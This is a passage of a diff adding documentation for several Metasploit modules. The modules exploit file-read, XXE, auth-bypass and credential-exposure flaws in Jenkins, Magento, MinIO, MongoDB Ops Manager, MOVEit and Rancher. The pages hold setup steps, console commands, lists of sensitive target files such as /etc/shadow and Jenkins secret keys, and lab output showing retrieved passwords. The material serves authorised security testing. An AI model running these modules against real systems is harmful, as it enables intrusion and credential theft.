+ * /var/jenkins_home/secrets/initialAdminPassword
+ * /etc/passwd
+ * /etc/shadow
+ * Project secrets and credentials
+ * Source code, build artifacts
+
+Vulnerable versions include:
+
+ * < 2.442
+ * LTS < 2.426.3
+
+### Protocol Breakdown
+
+A few samples of the protocol that was observed, how to generate it, and the breakdown of fields.
+ 
+|                                           | **Generator**                                                                    | **Heading**                  | **Pad (1)**      | **Unknown (len(@file_name) + 2)** | **len(@file_name)** | **@** | **file_name**            | **Unknown**  | **len(encoding)** | **UTF-8**  | **Unknown**  | **len(locality)** | **en_US**  | **footer** |
+|-------------------------------------------|----------------------------------------------------------------------------------|------------------------------|------------------|-------------|---------------------|-------|--------------------------|--------------|-------------------|------------|--------------|-------------------|------------|------------|
+| **no pad multi line file (/tmp/file.22)** | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help "@/tmp/test.22"   | 0000000600000468656c70000000 |                  | 0f0000      | 0d                  | 40    | 2f746d702f746573742e3232 | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+| **no pad single line file (/tmp/file.1)** | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help "@/tmp/test.1"    | 0000000600000468656c70000000 |                  | 0e0000      | 0c                  | 40    | 2f746d702f746573742e31   | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+| **pad multi line file (/tmp/file.22)**    | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/tmp/test.22" | 0000000600000468656c70000000 | 0300000131000000 | 0f0000      | 0d                  | 40    | 2f746d702f746573742e3232 | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+| **pad single line file (/tmp/file.1)**    | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/tmp/test.1"  | 0000000600000468656c70000000 | 0300000131000000 | 0e0000      | 0c                  | 40    | 2f746d702f746573742e31   | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+
+### Docker Setup
+
+Version 2.440: `docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.440-jdk17`
+
+LTS Version 2.426.2: `docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.426.2-lts`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read`
+1. Do: `set rhost [ip]`
+1. Do: `run`
+1. You should get the first two lines of the `FILE_PATH`
+
+## Options
+
+### FILE_PATH
+
+File path to read from the server. Defaults to `/etc/passwd`.
+
+Other files which may be of value:
+ * `/var/jenkins_home/secret.key`
+ * `/var/jenkins_home/secrets/master.key`
+ * `/var/jenkins_home/secrets/initialAdminPassword`
+ * `/etc/passwd`
+ * `/etc/shadow`
+ * Project secrets and credentials
+ * Source code, build artifacts
+
+### DELAY
+
+Delay between first and second request to ensure first request gets there on time, but the second request is very quickly behind it.
+Defaults to `0.5`
+
+Testing against the docker image showed values between `.01` and `1.9` were successful.
+
+### ENCODING
+
+Encoding to use for reading the file. This may mangle binary files. Defaults to `UTF-8`
+
+### LOCALITY
+
+Locality to use for reading the file. This may mangle binary files. Defaults to `en_US`
+
+## Scenarios
+
+### jenkins 2.440-jdk17 on Docker
+
+```
+msf6 > use auxiliary/gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > set file_path /var/jenkins_home/secrets/initialAdminPassword
+file_path => /var/jenkins_home/secrets/initialAdminPassword
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > run
+[*] Running module against 127.0.0.1
+
+[*] Sending requests with UUID: ed148f4d-709a-4d16-a452-4509f3a37ed6
+[*] Re-attempting with padding for single line output file
+[+] /var/jenkins_home/secrets/initialAdminPassword file contents retrieved (first line or 2):
+f5d5f6e98e1f466aad22c0f81ca48fb0
+[+] Results saved to: /root/.msf4/loot/20240130204021_default_127.0.0.1_jenkins.file_717110.txt
+[*] Auxiliary module execution completed
+```
+
+### jenkins 2.426.2-lts on Docker
+
+```
+msf6 > use auxiliary/gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > set file_path /var/jenkins_home/secret.key
+file_path => /var/jenkins_home/secret.key
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > run
+[*] Running module against 127.0.0.1
+
+[*] Sending requests with UUID: 0d69c3f1-7695-4db1-a0c6-08108f33e339
+[*] Re-attempting with padding for single line output file
+[+] /var/jenkins_home/secret.key file contents retrieved (first line or 2):
+6ce26592ad3683cc8d056bea07ffa2696f1b14f0db64dbd122c50ab930e279ad
+[+] Results saved to: /root/.msf4/loot/20240130204241_default_127.0.0.1_jenkins.file_317409.txt
+[*] Auxiliary module execution completed
+```
@@ -28,20 +28,25 @@ msf5 auxiliary(gather/ldap_hashdump) > options

 Module options (auxiliary/gather/ldap_hashdump):

-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   BASE_DN                     no        LDAP base DN if you already have it
-   BIND_DN                     no        The username to authenticate to LDAP server
-   BIND_PW                     no        Password for the BIND_DN
-   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
-   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT      1389             yes       The target port
-   SSL        false            no        Enable SSL on the LDAP connection
-   USER_ATTR  dn               no        LDAP attribute, that contains username
-
-
-Auxiliary action:
+   Name          Current Setting                                        Required  Description
+   ----          ---------------                                        --------  -----------
+   BASE_DN                                                              no        LDAP base DN if you already have it]
+   DOMAIN                                                               no        The domain to authenticate to
+   MAX_LOOT                                                             no        Maximum number of LDAP entries to loot
+   PASSWORD                                                             no        The password to authenticate with
+   PASS_ATTR     userPassword, sambantpassword, sambalmpassword, mailu  yes       LDAP attribute, that contains password hashes
+                 serpassword, password, pwdhistory, passwordhistory, c
+                 learpassword
+   READ_TIMEOUT  600                                                    no        LDAP read timeout in seconds
+   RHOSTS        127.0.0.1                                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
+                                                                                  tml
+   RPORT         1389                                                   yes       The target port
+   SSL           true                                                   no        Enable SSL on the LDAP connection
+   THREADS       1                                                      yes       The number of concurrent threads (max one per host)
+   USERNAME                                                             no        The username to authenticate with
+   USER_ATTR     dn                                                     no        LDAP attribute(s), that contains username

+                                                                                                                                                                                           Auxiliary action:
   Name  Description
   ----  -----------
   Dump  Dump all LDAP data
@@ -214,23 +214,33 @@ QUERY_FILE_PATH => /home/gwillcox/git/metasploit-framework/test.yaml
 msf6 auxiliary(gather/ldap_query) > show options

 Module options (auxiliary/gather/ldap_query):
-
-   Name             Current Setting                     Required  Description
-   ----             ---------------                     --------  -----------
-   BASE_DN                                              no        LDAP base DN if you already have it
-   BIND_DN          normal@daforest.com                 no        The username to authenticate to LDAP server
-   BIND_PW          thePassword123                      no        Password for the BIND_DN
-   OUTPUT_FORMAT    table                               yes       The output format to use (Accepted: csv, table, json)
-   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-fram  no        Path to the JSON or YAML file to load and run queries from
-                    ework/test.yaml
-   RHOSTS           172.27.51.83                        yes       The target host(s), see https://github.com/rapid7/metasploit-f
-                                                                  ramework/wiki/Using-Metasploit
-   RPORT            389                                 yes       The target port
-   SSL              false                               no        Enable SSL on the LDAP connection
+                                                                                                                                                                                              Name             Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   DOMAIN                              no        The domain to authenticate to
+   OUTPUT_FORMAT  table                yes       The output format to use (Accepted: csv, table, json)
+   PASSWORD       thePassword123       no        The password to authenticate with
+   RHOSTS         172.27.51.83         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+   USERNAME       normal@daforest.com  no        The username to authenticate with


-Auxiliary action:
+   When ACTION is RUN_QUERY_FILE:

+   Name             Current Setting                                    Required  Description
+   ----             ---------------                                    --------  -----------
+   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-framework/test.yaml  no        Path to the JSON or YAML file to load and run queries from
+
+
+   When ACTION is RUN_SINGLE_QUERY:
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   QUERY_ATTRIBUTES                   no        Comma separated list of attributes to retrieve from the server
+   QUERY_FILTER                       no        Filter to send to the target LDAP server to perform the query
+
+                                                                                                                                                                                           Auxiliary action:
   Name            Description
   ----            -----------
   RUN_QUERY_FILE  Execute a custom set of LDAP queries from the JSON or YAML file specified by QUERY_FILE.
@@ -0,0 +1,159 @@
+## Vulnerable Application
+
+### Description
+
+An unauthenticated user can read arbritraty file from Magento Community edition version 2.4.0 to 2.4.3.
+The vulnerability is due to the lack of input validation in the XML file. An attacker can exploit this
+vulnerability by sending a specially crafted XML file to the target server. The attacker can read any file on the server.
+
+On June 27, 2024, Adobe released a software update that addressed this vulnerability (CVE-2024-34102).
+
+The following products are affected:
+
+- Adobe Commerce: versions before:      2.4.7; 2.4.6-p5; 2.4.5-p7; 2.4.4-p8; 2.4.3-ext-7 ; 2.4.2-ext-7
+- Magento Open Source: versions before: 2.4.7; 2.4.6-p5; 2.4.5-p7; 2.4.4-p8
+- Adobe Commerce Webhooks Plugin: versions 1.2.0 to 1.4.0
+
+### Exploitation
+
+This module exploits the XXE vulnerability in Magento by following these steps:
+
+- Creating a DTD File: This file includes entities that will read and encode `FILE`, then send it to your endpoint.
+
+- Host the DTD File: Serve the dtd.xml file, accessible via HTTP `SRVHOST` on port `SRVPORT`.
+
+- Craft the HTTP Request: Craft the XML payload which will include the DTD file hosted on your server.
+
+- Execute a HTTP Request: Send the crafted XML payload to the target server.
+
+- Capture the Exfiltrated Data: The exfiltrated data will be sent back to the attacker in a HTTP GET request and them saved in the loot.
+
+
+
+### Setup
+
+Create a `docker-compose.yml` file as below:
+
+```yml
+version: '2'
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_magento
+      - MARIADB_DATABASE=bitnami_magento
+    volumes:
+      - 'mariadb_data:/bitnami/mariadb'
+  magento:
+    image: docker.io/bitnami/magento:2
+    ports:
+      - '80:8080'
+      - '443:8443'
+    environment:
+      - MAGENTO_HOST=localhost
+      - MAGENTO_DATABASE_HOST=mariadb
+      - MAGENTO_DATABASE_PORT_NUMBER=3306
+      - MAGENTO_DATABASE_USER=bn_magento
+      - MAGENTO_DATABASE_NAME=bitnami_magento
+      - ELASTICSEARCH_HOST=elasticsearch
+      - ELASTICSEARCH_PORT_NUMBER=9200
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+    volumes:
+      - 'magento_data:/bitnami/magento'
+    depends_on:
+      - mariadb
+      - elasticsearch
+  elasticsearch:
+    image: docker.io/bitnami/elasticsearch:7
+    volumes:
+      - 'elasticsearch_data:/bitnami/elasticsearch/data'
+volumes:
+  mariadb_data:
+    driver: local
+  magento_data:
+    driver: local
+  elasticsearch_data:
+    driver: local
+```
+
+Run the below command to create the container:
+
+```
+$ docker-compose up
+```
+
+
+## Verification Steps
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+### TARGETURI (required)
+
+The path to the Magento (Default: `/`).
+
+### SRVHOST (required)
+
+The local IP address to listen on. This must be a routable IP address on the local machine (0.0.0.0 is invalid). 
+
+### SRVPORT (required)
+
+The local port to listen on.
+
+## Scenarios
+
+### Docker container running Magento Community edition version 2.4
+
+```
+Module options (exploit/multi/http/magento_xxe_cve_2024_34102):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   FILE       /etc/passwd      yes       The file to read
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    192.168.128.1    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to the web application
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST      localhost        no        HTTP server virtual host
+```
+
+```   
+msf6 exploit(multi/http/magento_xxe_cve_2024_34102) > 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Using URL: http://192.168.128.1:8080/
+[*] Sending XXE request
+[*] Received request for DTD file from 192.168.144.4
+[+] Received file /etc/passwd content
+[+] File saved in: /home/redwaysecurity/.msf4/loot/20240715171929_default_127.0.0.1_etcpasswd_069426.txt
+
+msf6 exploit(multi/http/magento_xxe_cve_2024_34102) > cat /home/redwaysecurity/.msf4/loot/20240715171929_default_127.0.0.1_etcpasswd_069426.txt
+[*] exec: cat /home/redwaysecurity/.msf4/loot/20240715171929_default_127.0.0.1_etcpasswd_069426.txt
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+msf6 exploit(multi/http/magento_xxe_cve_2024_34102) > 
+```
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+MinIO is a Multi-Cloud Object Storage framework. In a cluster deployment starting with
+RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns
+all environment variables, including `MINIO_SECRET_KEY` and `MINIO_ROOT_PASSWORD`,
+resulting in information disclosure.
+
+### Docker Image
+
+1. Download docker yml: https://raw.githubusercontent.com/vulhub/vulhub/master/minio/CVE-2023-28432/docker-compose.yml
+1. Execute `docker-compose up` inside the same directory containing the docker-compose.yml
+1. Then MinIO's login page should be available at http://127.0.0.1:9001/
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/gather/minio_bootstrap_verify_info_disc.rb`
+1. Do: `set rhost [IP]`
+1. Do: `run`
+1. You should get MinIO Environmental Variables
+
+## Options
+
+## Scenarios
+
+### MinIO 2023-02-27T18:10:45Z from docker image
+
+```
+resource (msf)> set rhost 127.0.0.1
+rhost => 127.0.0.1
+resource (msf)> set rport 9000
+rport => 9000
+msf6 auxiliary(gather/minio_bootstrap_verify_info_disc) > run
+[*] Reloading module...
+[*] Running module against 127.0.0.1
+
+[+] MINIO_ACCESS_KEY_FILE: access_key
+[+] MINIO_CONFIG_ENV_FILE: config.env
+[+] MINIO_KMS_SECRET_KEY_FILE: kms_master_key
+[+] MINIO_ROOT_PASSWORD: minioadmin-vulhub
+[+] MINIO_ROOT_PASSWORD_FILE: secret_key
+[+] MINIO_ROOT_USER: minioadmin
+[+] MINIO_ROOT_USER_FILE: access_key
+[+] MINIO_SECRET_KEY_FILE: secret_key
+[+] MinIO Environmental Variables Json Saved to: /root/.msf4/loot/20240131112953_default_127.0.0.1_minio.env.json_772811.json
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,82 @@
+## Vulnerable Application
+
+MongoDB Ops Manager Diagnostics Archive does not redact SAML SSL Pem Key File Password
+field (`mms.saml.ssl.PEMKeyFilePassword`) within app settings. Archives do not include
+the PEM files themselves. This module extracts that unredacted password and stores
+the diagnostic archive for additional manual review.
+
+This issue affects MongoDB Ops Manager v5.0 prior to 5.0.21 and
+MongoDB Ops Manager v6.0 prior to 6.0.12.
+
+API credentials with the role of `GLOBAL_MONITORING_ADMIN` or `GLOBAL_OWNER` are required.
+
+Successfully tested against MongoDB Ops Manager v6.0.11.
+
+### Install on Ubuntu 22.04
+
+1. Download mongodb server deb from https://www.mongodb.com/download-center/community/releases/archive .
+ Look for: `Server Package: mongodb-org-server_6.0.11_amd64.deb`
+2. Download the 1.4gig ops manager (mms) deb from https://www.mongodb.com/subscription/downloads/archived
+3. `sudo apt-get install snmp`
+4. `sudo dpkg -i mongodb-org-server_6.0.11_amd64.deb`
+5. `sudo dpkg -i mongodb-mms-*`
+6. `sudo nano /opt/mongodb/mms/conf/conf-mms.properties` and add a new field at the bottom of the file: `mms.saml.ssl.PEMKeyFilePassword=FINDME`
+7. `sudo systemctl start mongod.service`
+8. `sudo systemctl start mongodb-mms.service` (wait a little while for it to initialize and run)
+9. Browse to http://<ip>>:8080/account/register and perform the install, the SMTP fields can use values for a server which doesn't exist.
+10. Top left corner of the page after install should be "Project 0", click the drop down and create new project. Any name is fine, I called it 'test'
+11. Top right of the screen, click Admin, API Keys, Create API Key. Create a new key, for permissions select
+`Global Monitoring Admin` or `Global Owner` (or both).
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info`
+1. Do: `set API_PUBKEY [API_PUBKEY]`
+1. Do: `set API_PRIVKEY [API_PRIVKEY]`
+1. Do: `run`
+1. You should find similar output to the following: `Found ubuntu22-0-bgrid's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME`
+
+## Options
+
+### API_PUBKEY
+
+Public Key for the API key that was created with `Global Monitoring Admin` or `Global Owner` permissions.
+
+### API_PRIVKEY
+
+Private Key for the API key that was created with `Global Monitoring Admin` or `Global Owner` permissions.
+
+## Scenarios
+
+### Mongodb OPS Manager 6.0.11 on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) > set API_PUBKEY zmdhriti
+API_PUBKEY => zmdhriti
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) > set API_PRIVKEY fd2faf05-18bc-4e6b-8ea1-419f3e8f95bc
+API_PRIVKEY => fd2faf05-18bc-4e6b-8ea1-419f3e8f95bc
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) > set verbose true
+verbose => true
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) > run 
+[*] Running module against 127.0.0.1
+
+[*] Checking for orgs
+[*] Looking for projects in org 65e86256961a9b1cc98c6c8b
+[+]   Found project: Project 0 (65e86256961a9b1cc98c6c8f)
+[+] Stored Project Diagnostics files to /root/.msf4/loot/20240307151114_default_127.0.0.1_mongodb.ops_mana_015137.gz
+[*]     Opening project_diagnostics.tar.gz
+[+] Found ubuntu22-0-bgrid's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
+[+] Found ubuntu22-0-mms's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
+[+]   Found project: test (65e86331961a9b1cc98c6db7)
+[+] Stored Project Diagnostics files to /root/.msf4/loot/20240307151114_default_127.0.0.1_mongodb.ops_mana_205173.gz
+[*]     Opening project_diagnostics.tar.gz
+[+] Found ubuntu22-0-bgrid's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
+[+] Found ubuntu22-0-mms's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) >
+```
@@ -0,0 +1,96 @@
+## Vulnerable Application
+This module exploits CVE-2024-5806, an authentication bypass vulnerability in the MOVEit Transfer SFTP service. The
+following version are affected:
+
+* MOVEit Transfer 2023.0.x (Fixed in 2023.0.11)
+* MOVEit Transfer 2023.1.x (Fixed in 2023.1.6)
+* MOVEit Transfer 2024.0.x (Fixed in 2024.0.2)
+
+The module can establish an authenticated SFTP session for a MOVEit Transfer user. The module allows for both listing
+the contents of a directory, and the reading of an arbitrary file.
+
+Read our AttackerKB [Rapid7 Analysis](https://attackerkb.com/topics/44EZLG2xgL/cve-2024-5806/rapid7-analysis)
+for a full technical description of both the vulnerability and exploitation.
+
+## Testing
+1. Installation requires a valid trial license that can be obtained by going here:
+   https://www.ipswitch.com/forms/free-trials/moveit-transfer
+2. Ensure that your computer has internet access for the license to activate and double-click the installer.
+3. Follow installation instructions for an evaluation installation.
+4. After the installation completes, follow the instructions to create an sysadmin user.
+5. Log in as the sysadmin and create a new Organization (e.g. `TestOrg`).
+6. In the `Home` section, click the "Act as administrator in the TestOrg organization" button.
+7. In the `Users` section, create a new normal user (e.g. `testuser1`) in the new Organization.
+8. In the `Folders` section, navigate to the `testuser1` Home folder and create some files and folders.
+9. The SFTP service will be running by default. No further configuration is required.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use auxiliary/gather/progress_moveit_sftp_fileread_cve_2024_5806`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set STORE_LOOT false`
+5. `set TARGETUSER <TARGET_USERNAME>` (Must be a valid username on the target server, for example `testuser1`)
+6. `set TARGETFILE /`
+7. `check`
+8. `run`
+
+## Options
+
+### STORE_LOOT
+Whether the read file's contents should be stored as loot in the Metasploit database. If set to false, the files
+content will be displayed in the console. (default: true).
+
+### TARGETUSER
+A valid username to authenticate as. (default: nil).
+
+### TARGETFILE
+The full path of a target file or directory to read. If a directory path is specified, the output will be the
+directories contents. If a file path is specified, the output will be the files contents. In order to learn
+what files you can read, you can first read the root directories (/) contents. (default: /).
+
+## Scenarios
+
+### Default
+
+```
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > set RHOST 169.254.180.121
+RHOST => 169.254.180.121
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > set STORE_LOOT false
+STORE_LOOT => false
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > set TARGETUSER testuser1
+TARGETUSER => testuser1
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > show options
+
+Module options (auxiliary/gather/progress_moveit_sftp_fileread_cve_2024_5806):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   RHOSTS      169.254.180.121  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT       22               yes       The target port
+   STORE_LOOT  false            no        Store the target file as loot
+   TARGETFILE  /                yes       The full path of a target file or directory to read.
+   TARGETUSER  testuser1        yes       A valid username to authenticate as.
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > run
+[*] Running module against 169.254.180.121
+
+[*] Authenticating as: testuser1@169.254.180.121:22
+[*] Listing directory: /
+dr-xr-xr-x 1 0 0 0 Jun 23 16:19 /Home/
+dr-xr-xr-x 1 0 0 0 Jun 18 22:50 /Home/testuser1/
+dr-xr-xr-x 1 0 0 0 Jun 18 22:50 /Home/testuser1/TestFolder1/
+-rw-rw-rw- 1 0 0 8 Jun 18 22:50 /Home/testuser1/test.txt
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > run TARGETFILE=/Home/testuser1/test.txt
+[*] Running module against 169.254.180.121
+
+[*] Authenticating as: testuser1@169.254.180.121:22
+[*] Downloading file: /Home/testuser1/test.txt
+secrets!
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > 
+```
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+An issue was discovered in Rancher versions up to and including
+2.5.15 and 2.6.6 where sensitive fields, like passwords, API keys
+and Ranchers service account token (used to provision clusters),
+were stored in plaintext directly on Kubernetes objects like Clusters,
+for example cluster.management.cattle.io. Anyone with read access to
+those objects in the Kubernetes API could retrieve the plaintext
+version of those sensitive data.
+
+### Install
+
+* Clone the repository from: https://github.com/fe-ax/tf-cve-2021-36782
+* Create a Digital Ocean API Token
+    * Log into Digital Ocean and navigate to: API > Tokens
+    * Select "Generate New Token"
+    * Enter a token name and then select either Full Access or Custom Scopes
+        * If selecting Custom Scopes, use the values provided below
+* Back in the `tf-cve-2021-36782`, copy the `example.tfvars` file to `yourown.tfvars`
+* Edit `yourown.tfvars` and add the newly generated DO API token as `do_token`
+    * Optionally set the region for the clusters to one closer to you (e.g. `nyc3`)
+* Run `terraform init`
+* Run `terraform apply -var-file yourown.tfvars`, this can take about 20 minutes to run
+* Take the hostname from the `rancher_admin_url` output from terraform and use that as the `RHOST` value for the module
+* Take the password from the `rancher_password` file and use that with the username "admin" for the module
+
+#### Digital Ocean API Token Custom Scopes
+It's possible that there are unnecessary privileges contained within the following settings, however it does permit the
+test environment to start without a full access token.
+
+* Fully Scoped Access:
+    * 1click (2): create, read
+    * account (1): read
+    * actions (1): read
+    * billing (1): read
+    * kubernetes (5): create, read, update, delete, access_cluster
+    * load_balancer (4): create, read, update, delete
+    * monitoring (4): create, read, update, delete
+    * project (4): create, read, update, delete
+    * regions (1): read
+    * registry (4): create, read, update, delete
+    * sizes (1): read
+* Create Access:
+    * app / droplet / firewall / ssh_key
+* Read Access:
+    * app / block_storage / block_storage_action / block_storage_snapshot / cdn / certificate / database / domain / droplet / firewall / function / image / reserved_ip / snapshot / ssh_key / tag / uptime / vpc
+* Update Access:
+    * ssh_key
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/rancher_authenticated_api_cred_exposure`
+1. Do: `set rhosts [ip]`
+1. Do: `set username [username]`
+1. Do: `set password [password]`
+1. Do: `run`
+1. If any API items of value are found, they will be printed
+
+## Options
+
+### Username
+
+Username for Rancher. user must be in one or more of the following groups:
+
+* `Cluster Owners`
+* `Cluster Members`
+* `Project Owners`
+* `Project Members`
+* `User Base`
+
+### Password
+
+Password for Rancher.
+
+## Scenarios
+
+### Docker Image
+
+```
+msf6 > use auxiliary/gather/rancher_authenticated_api_cred_exposure 
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set rhosts rancher.178.62.209.204.sslip.io
+rhosts => rancher.178.62.209.204.sslip.io
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set username readonlyuser
+username => readonlyuser
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set password readonlyuserreadonlyuser
+password => readonlyuserreadonlyuser
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set verbose true
+verbose => true
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > run
+[*] Running module against 178.62.209.204
+
+[*] Attempting login
+[-] Auxiliary aborted due to failure: unreachable: 178.62.209.204:443 - Could not connect to web service - no response
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > run
+[*] Running module against 178.62.209.204
+
+[*] Attempting login
+[+] login successful, querying APIs
+[*] Querying /v1/management.cattle.io.catalogs
+[*] Querying /v1/management.cattle.io.clusters
